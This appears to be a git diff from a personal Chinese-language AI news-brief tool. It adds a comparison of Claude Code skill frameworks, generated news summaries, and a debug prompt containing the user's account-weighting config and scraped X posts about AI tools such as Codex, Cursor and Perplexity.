Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-guardrails / write-a-skill / caveman 等。\n\n1️⃣ vs anthropic/skills · 「格式」vs「流程」\n\nanthropic 做的: pdf · xlsx · docx · pptx · skill-creator\n ↑ 文件格式 skill — 给 Agent 加「读写文件」的能力\n\n差别:Anthropic 给四肢,Matt 给教练笔记。前者扩展能力边界,后者塑造行为模式。装 anthropic 之后你的 Claude 能做更多事;装 Matt 之后你的 Claude 做事方式不一样了\n\n2️⃣ vs obra/superpowers · 「小而精 + 哲学」 vs 「包罗万象」\n\nmattpocock superpowers Skill 数 16 \n50+ 设计风格 引用 Pragmatic Programmer / DDD / Ousterhout 的经典原则 自创规则、自成体系 \n\n每个 skill 的「为什么」 配一段经典书摘做锚点 没有 强制度 高 极高(DO NOT 列表更长) \n\n启动时间 / Token 消耗 3.8s / 2,580 tok 8.7s / 4,820 tok\n\n差别:Matt 把 skill 框成「编码的智慧」,Jesse 把 skill 框成「合规的流程」。前者优雅、可读;后者严苛、稳定。Matt 的 16 个 skill 你能记得住,superpowers 的 50+ 你只记得「装上之后什么都得跑一圈」\n\n3️⃣ vs kentcdodds/compound-engineering · 「solo-dev 纪律」vs 「agent 编排」\n\nmattpocock compound-engineering 服务对象 一个人 Agent 集群 价值机制 即刻见效 复利累积(6 个月才显化) \n\n状态 无状态 自我反思 + improvements.log 6 月留存率 ~55% 78%(4 框架最高) 上手难度 低 高\n\n差别:Matt 解决「我现在该怎么动手」,Kent 解决「我的 Agent 该怎么变聪明」。前者实用主义、立即生效;后者长期主义、未来主义。Matt 的 skill 装上 5 分钟就有用,compound-engineering 要等半年看复利\n\n🌟 一句话定位\nanthropic 给工具,Matt 给纪律,Jesse 给流水线,Kent 给成长机制\n\n这 4 个框架不是替代关系:重度用户通常装 anthropic(工具)+ Matt(纪律)+ superpowers(关键代码段) 三件套" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_190051_l2_output.json b/data/x_brief/debug/20260429_190051_l2_output.json new file mode 100644 index 0000000..c0f7546 --- /dev/null +++ b/data/x_brief/debug/20260429_190051_l2_output.json @@ -0,0 +1,16 @@ +{ + "target_indexes": [ + 445, + 16, + 97, + 9, + 38 + ], + "broadcast_zh": [ + "GPT-5.5于Cursor平台发布,评测准确率达72.8%位居榜首,Cursor与OpenAI联合推出限时折扣优惠,截至5月2日。", + "Claude推出Blender MCP连接器,通过自然语言控制3D建模软件API,实现场景调控、物体批量编辑等操作,Anthropic同步加入Blender基金会成为赞助商。", + "Claude推出融合Blender、Autodesk Fusion等多领域专业工具的对话连接器,实现3D建模与设计流程的智能化协作,并加入Blender开发基金支持开源生态。", + "近日有开发者历时两个月将GitHub上AI相关开源项目进行索引与分析,数据库总量达67,196项。研究显示该领域项目分布严重失衡:基尼系数0.983创新高,过半项目无人关注,头部1%占据83%关注度,且2026年3月单月新增项目数达前年月均45倍。研究结果及完整数据可参考相关平台。", + "Mattpocock推出的Skill框架获GitHub38K星标,通过16项模块化技能将资深工程师代码规范系统化注入Claude Code,区别于Anthropic的AI能力扩展和Obra的实践哲学设计,形成更规范化的代码生成流程体系。" + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260501_092840_l1_stage1_input.txt b/data/x_brief/debug/20260501_092840_l1_stage1_input.txt new file mode 100644 index 0000000..2bdd51c --- /dev/null +++ b/data/x_brief/debug/20260501_092840_l1_stage1_input.txt @@ -0,0 +1,461 @@ +[meta] + +tweets=120 + +tweet_summary_chars=107489 + +phase=stage1_draft + + + +[prompt] + +你是“X资讯月报总编”。请先产出“结构草案 JSON”(阶段1),供后续阶段2定稿使用。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +阶段1输出要求(仅草案): +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 使用如下字段(严格保持键名): +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "trending_keywords":["关键词1","关键词2","关键词3"], + "themes":[{"id":"t1","title":"...","subtitle":"...","priority":"P0|P1|P2","bullets":["..."],"sample_urls":["..."]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","item_urls":["..."],"item_texts":["..."]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) trending_keywords:3-6 个当期最热词条(中英均可),直接从推文内容提炼。 +5) themes 的 priority 字段:首个主题通常为 P0,其余为 P1/P2;根据重要性自判。 +6) 每个模块优先包含可验证 URL;无法确定时宁缺毋滥。 +7) 内容必须中文,简洁可执行。 +8) JSON 必须合法:双引号、无注释、无尾逗号。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-29(新增 Cursor 官方账号 + 17位中文区博主;华语圈从3人扩充至20人) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @cursor_ai | Cursor | 中 | 产品更新、功能发布、Cursor生态 | 新增;AI编程工具官方账号,主线之一 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉 | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容 | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ✅ 以下所有账号均为英文 handle,Nitter RSS 和 xint 均可正常抓取,无需 X API 补充。 +> ⚠️ 例外:@二级炒家 仍为中文 handle,需走 X API 通道。 + +#### 华语圈 · AI 编程 / 工具(与用户核心兴趣高度重叠) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @svwang1 | 王川(硅谷) | 高 | 科技投资观察、深度思考 | 质量高,思考密度接近英文圈顶级账号 | +| @bozhou_ai | 泊舟 | 高 | 智能体构建、提示词、AI编程实践 | 新增;AI程序员+氛围编程践行者,2.1万粉,内容实操性强 | +| @lxfater | 铁锤人 | 高 | AI工具、开源项目、创业实践 | 新增;GitHub 3万星热门项目作者,B站内容参考价值高 | +| @berryxia | Berryxia | 高 | AI工具、系统提示词、设计美学 | 新增;提示词研究深度高,和用户兴趣直接对齐 | +| @Pluvio9yte | 雪踏乌云 | 高 | 氛围编程、AI编程技巧、产品出海 | 新增;大厂开发者视角,实操经验丰富 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 技术洞见高质量,但更新频率偏低 | +| @CuiMao | CuiMao | 中 | 深度学习、NVIDIA生态、ComfyUI工作流 | 新增;技术深度强,ComfyUI方向与AI工具主线相关 | +| @0xAA_Science | 0xAA | 中 | Web3教育、开源项目、AI+Web3交叉 | 新增;北大计算机博士,WTF Academy发起人,技术可信度高;偏Web3但有AI视角 | + +#### 华语圈 · 独立创作者 / 产品人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @dingyi | Ding | 中 | 独立产品、SaaS工具、产品设计 | 新增;SaasPick/TopFeed作者,全网15万粉,出海产品实战参考 | +| @GoSailGlobal | Jason Zhu | 中 | SaaS出海、AI资讯、Agent资源站 | 新增;独立开发者,搭建AI Agent聚合资源站,出海视角有参考价值 | +| @frxiaobei | 凡人小北 | 中 | AI战略咨询、AIGC商业落地 | 新增;商业+战略顾问背景,关注真实商业场景的AI落地,偏B端视角 | +| @gkxspace | 余温 | 中 | AI产品商业化、从0到1创业 | 新增;05年连续创业者,已有AI项目七位数营收,创业实战参考价值高 | +| @Stv_Lynn | Steven Lynn | 中 | 科技播客、AI社区活动 | 新增;FirstLabAI播客主持人+Crazy Saturday主办者,华语AI圈社交节点 | +| @chuxiaeth | 初夏 | 中 | AI学习分享、个人成长 | 新增;Cursor资助创作者,内容质量待观察,初设中权重 | + +#### 华语圈 · Crypto / 链上(低权重,仅关注AI交叉内容) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @wolfyxbt | 杀破狼 | 低 | 氛围编程、链上数据、Meme币 | 新增;表达一针见血,但主线偏Meme币;仅关注AI编程相关内容 | +| @runes_leo | Leo | 低 | 比特币生态、链上量化 | 新增;AI+Crypto独立建设者,主线偏比特币生态,AI交叉内容才关注 | +| @oranges | 比特币橙子 | 低 | 比特币、AI工具(OwlClawHub) | 新增;搭建了AI智能体工具集,但主业是加密投资;仅关注AI工具相关 | +| @realNyarime | 奶昔 | 低 | eSIM技术、社区运营 | 新增;主业eSIM和奶昔社区,与简报主线相关性低;暂设低权重观察 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 修正7处、新增5个、删除7个 | +| 2026-04-29 | 批量新增华语圈博主 | 添加Cursor官方账号 + 15位Cursor资助中文区创作者 + 1位用户自荐(@chuxiaeth) | 总账号数从33增至51;华语圈从3扩充至20;新增AI编程/工具高权重博主4个 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 +- [ ] 新加入的华语圈账号经过 2 周观察后,根据实际内容质量调整权重 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-05-01T01:28:40.335641+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 44 | **成功获取**: 35 | **推文总数**: 492 + +--- + +### ✅ @karpathy — Andrej Karpathy(3 条) + +**[2026-04-30T17:43:06+00:00]** +> This is the the quote I've been citing a lot recently. +[原文链接](https://x.com/karpathy/status/2049907410303865030) + +**[2026-04-30T17:28:50+00:00]** +> Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights: The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). T… +[原文链接](https://x.com/karpathy/status/2049903821095354523) + +**[2026-04-27T21:34:34+00:00]** +> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh… +[原文链接](https://x.com/karpathy/status/2048878495539843211) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-05-01T01:17:03+00:00]** +> artificial goblin intelligence achieved +[原文链接](https://x.com/sama/status/2050021650641695108) + +**[2026-04-30T20:16:55+00:00]** +> big upgrade for codex today! try it for non-coding computer work. +[原文链接](https://x.com/sama/status/2049946120441520624) + +**[2026-04-30T20:12:24+00:00]** +> it does seem cool +[原文链接](https://x.com/sama/status/2049944981750833659) + +**[2026-04-30T19:23:47+00:00]** +> RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update. +[原文链接](https://x.com/sama/status/2049932746567598472) + +**[2026-04-30T19:08:00+00:00]** +> RT by @sama: It's never been easier to do everyday work with Codex. Choose your role, connect the apps you use every day, and try suggested prompts. Codex helps with everything from research and plan… +[原文链接](https://x.com/sama/status/2049928776147230886) + +**[2026-04-30T17:29:15+00:00]** +> lisan say more mean things about us you're being too nice +[原文链接](https://x.com/sama/status/2049903925311267311) + +**[2026-04-30T05:56:16+00:00]** +> RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a wi… +[原文链接](https://x.com/sama/status/2049729530059960571) + +**[2026-04-30T04:59:15+00:00]** +> alignment failure +[原文链接](https://x.com/sama/status/2049715178611380317) + +**[2026-04-30T04:46:56+00:00]** +> we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days. we will work with the entire ecosystem and the government to figure out trus… +[原文链接](https://x.com/sama/status/2049712078836170843) + +**[2026-04-30T03:27:12+00:00]** +> R to @sama: openai.com/index/where-the-g… +[原文链接](https://x.com/sama/status/2049692014586048973) + +**[2026-04-30T03:27:08+00:00]** +> goblinblog dropped +[原文链接](https://x.com/sama/status/2049691999444639872) + +**[2026-04-30T03:18:22+00:00]** +> RT by @sama: This GPT Image 2 prompt is going insanely viral right now. “Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it… +[原文链接](https://x.com/sama/status/2049689793118998717) + +**[2026-04-30T00:55:24+00:00]** +> R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local. we'll close the link tomorrow at 5:55 pm. +[原文链接](https://x.com/sama/status/2049653814463168638) + +**[2026-04-30T00:55:23+00:00]** +> GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. if you'd like to come, let us know here: https://luma.com/5.5 codex will help the team pick people from the… +[原文链接](https://x.com/sama/status/2049653810558353746) + +**[2026-04-29T14:19:33+00:00]** +> R to @sama: i meant a goblin moment, sorry +[原文链接](https://x.com/sama/status/2049493797114126484) + +**[2026-04-29T14:18:48+00:00]** +> feels like codex is having a chatgpt moment +[原文链接](https://x.com/sama/status/2049493609028923826) + +**[2026-04-29T14:14:59+00:00]** +> i love that the team does stuff like this +[原文链接](https://x.com/sama/status/2049492646792757552) + +**[2026-04-29T13:15:47+00:00]** +> RT by @sama: terminal has been my primary interface to my computer for almost two decades. now it’s the Codex app. +[原文链接](https://x.com/sama/status/2049477747882254775) + +**[2026-04-29T02:31:21+00:00]** +> R to @sama: at this point @ajambrosino is mogmogging enjoy the next few updates +[原文链接](https://x.com/sama/status/2049315574120055054) + +**[2026-04-29T02:27:13+00:00]** +> Image +[原文链接](https://x.com/sama/status/2049314532892475791) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(7 条) + +**[2026-05-01T00:18:54+00:00]** +> RT by @AravSrinivas: $AAPL CFO: “Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous agents and boost work… +[原文链接](https://x.com/AravSrinivas/status/2050007015616135365) + +**[2026-04-28T16:05:11+00:00]** +> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al… +[原文链接](https://x.com/AravSrinivas/status/2049157990604025896) + +**[2026-04-28T15:38:49+00:00]** +> R to @AravSrinivas: reddit.com/r/GeminiAI/commen… +[原文链接](https://x.com/AravSrinivas/status/2049151356985040934) + +**[2026-04-28T15:38:28+00:00]** +> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes. +[原文链接](https://x.com/AravSrinivas/status/2049151268606894310) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +**[2026-04-24T19:03:21+00:00]** +> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y… +[原文链接](https://x.com/AravSrinivas/status/2047753276888854595) + +**[2026-04-24T18:44:19+00:00]** +> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047748486767272243) + +--- + +### ✅ @AndrewYNg — Andrew Ng(2 条) + +**[2026-04-30T16:21:35+00:00]** +> Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out. I'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current s… +[原文链接](https://x.com/AndrewYNg/status/2049886895530967534) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @cursor_ai — Cursor(14 条) + +**[2026-04-30T18:58:07+00:00]** +> R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience. Security agents draw from your existing usage poo… +[原文链接](https://x.com/cursor_ai/status/2049926287439929475) + +**[2026-04-30T18:58:06+00:00]** +> R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements. Adjust triggers, add your own instructions, give them custom tooling, and choose how outputs are sha… +[原文链接](https://x.com/cursor_ai/status/2049926285518848093) + +**[2026-04-30T18:58:06+00:00]** +> Cursor Security Review is now available for Teams and Enterprise plans. Run two types of always-on agents: 1. Security Reviewer checks every PR for vulnerabilities and leaves comments. 2. Vulnerabili… +[原文链接](https://x.com/cursor_ai/status/2049926283061035254) + +**[2026-04-30T17:19:22+00:00]** +> Our agent harness makes models inside Cursor faster, smarter, and more token-efficient. Here's how we test improvements to the harness, monitor and repair degradations, and customize it for different… +[原文链接](https://x.com/cursor_ai/status/2049901436918436249) + +**[2026-04-29T14:43:43+00:00]** +> R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codeb… +[原文链接](https://x.com/cursor_ai/status/2049499876388454903) + +**[2026-04-29T14:43:42+00:00]** +> R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board. Use Cursor to customize them for your use ca… +[原文链接](https://x.com/cursor_ai/status/2049499874043830389) + +**[2026-04-29T14:43:42+00:00]** +> R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud. +[原文链接](https://x.com/cursor_ai/status/2049499871980200082) + +**[2026-04-29T14:43:40+00:00]** +> We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to-end workflows, or… +[原文链接](https://x.com/cursor_ai/status/2049499866217185492) + +**[2026-04-24T19:48:34+00:00]** +> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download +[原文链接](https://x.com/cursor_ai/status/2047764656165646786) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders. +[原文链接](https://x.com/cursor_ai/status/2047764654760632725) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha… +[原文链接](https://x.com/cursor_ai/status/2047764652977958938) + +**[2026-04-24T19:48:33+00:00]** +> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur… +[原文链接](https://x.com/cursor_ai/status/2047764651363180839) + +**[2026-04-24T18:28:47+00:00]** +> R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench +[原文链接](https://x.com/cursor_ai/status/2047744580280561948) + +**[2026-04-24T18:28:47+00:00]** +> GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%. We've partnered with OpenAI to offer it for 50% off through May 2. +[原文链接](https://x.com/cursor_ai/status/2047744579127185843) + +--- + +### ✅ @ylecun — Yann LeCun(20 条) + +**[2026-04-30T11:02:45+00:00]** +> RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱: ▶️demo: https://aidemos.atmeta.com/tribev2/ 📄paper: htt… +[原文链接](https://x.com/ylecun/status/2049806660001022372) + +**[2026-04-30T06:58:24+00:00]** +> RT by @ylecun: These folks are trying to ban open source. They're looking to take away your freedom to choose. They're also looking to take away the rights of businesses like Cursor to fine tune and … +[原文链接](https://x.com/ylecun/status/2049745165665853742) + +**[2026-04-30T00:05:29+00:00]** +> Trump's war on science. +[原文链接](https://x.com/ylecun/status/2049641252287607241) + +**[2026-04-29T22:48:11+00:00]** +> RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration: “I’d be surprised if we don’t g… +[原文链接](https://x.com/ylecun/status/2049621796736180438) + +**[2026-04-29T20:43:08+00:00]** +> RT by @ylecun: Science is how we’ve c + +推文样本(JSON): +[{"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T01:17:03+00:00", "title": "artificial goblin intelligence\n\nachieved", "url": "https://x.com/sama/status/2050021650641695108"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T01:13:13+00:00", "title": "I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?", "url": "https://x.com/GaryMarcus/status/2050020685733564459"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T01:11:09+00:00", "title": "Most evil person in AI", "url": "https://x.com/GaryMarcus/status/2050020164612104604"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T01:09:21+00:00", "title": "Once again IP thieves accusing other IP thieves of IP thievery! \n\nThe nerve!", "url": "https://x.com/GaryMarcus/status/2050019713409814672"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T01:04:19+00:00", "title": "😂😂😂@ATLHawks", "url": "https://x.com/jason/status/2050018446616797370"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T01:01:26+00:00", "title": "We’re finally signing. https://www.bizjournals.com/sanjose/news/2017/06/24/vcs-rally-around-decency-pledge-after-silicon.html", "url": "https://x.com/pmarca/status/2050017717592510568"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-05-01T00:55:00+00:00", "title": "Why Dario at Anthropic has such a hard job predicting compute demands?\n\n\"The stakes are enormous and the margin for error is tiny.\n\nFor every dollar of revenue, you may need $4–5 in upfront compute investment.\n\nIf you underinvest, you cannot meet demand. If you overinvest, you ar", "url": "https://x.com/HarryStebbings/status/2050016099606118504"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:52:14+00:00", "title": "R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/", "url": "https://x.com/berryxia/status/2050015406140903487"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T00:52:14+00:00", "title": "🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层!\n@Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能!\n\n1. 从文本/平面图直接生成精准 BREP CAD 模型\n2. Three.js 实时渲染 + Google AI 驱动,全流程端到端\n3.完整开源可用", "url": "https://x.com/berryxia/status/2050015402647027808"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:38:13+00:00", "title": "No comment", "url": "https://x.com/jason/status/2050011874989649946"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:38:00+00:00", "title": "Whoever is running the hawks social is a savage 😂", "url": "https://x.com/jason/status/2050011821914865685"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T00:38:00+00:00", "title": "38k 星的 skill 仓库。\n\n上周抄了 1 个 grill-me,今天又加了另外 2 个。\n\n一个是 /tdd 思路。\n\n动手前先写一行——跑完应该长啥样。\n对得上才往下走。\n\n加进自己的自检流程,只用于策略代码或 API 调用那类——\n跑了对不对要 grep log 才知道的场景。\n\nskill 没装,精华抄过来了。\n\n另一个是他 SKILL.md 的渐进式骨架。\n照着写了个模板,下次新写 skill 直接套。\n\n剩下 13 件翻了一遍,没一件用得上——\n他全围绕代码工程,我这边的栈错位太大。\n\n差别挺有意思:\n\n他走工程师纯度路线,16 个 s", "url": "https://x.com/runes_leo/status/2050011821352829116"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T00:27:22+00:00", "title": "Tokenmaxxing is stupid. \n\nChange my mind?", "url": "https://x.com/GaryMarcus/status/2050009144846119068"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T00:26:51+00:00", "title": "RT by @Jason: Image", "url": 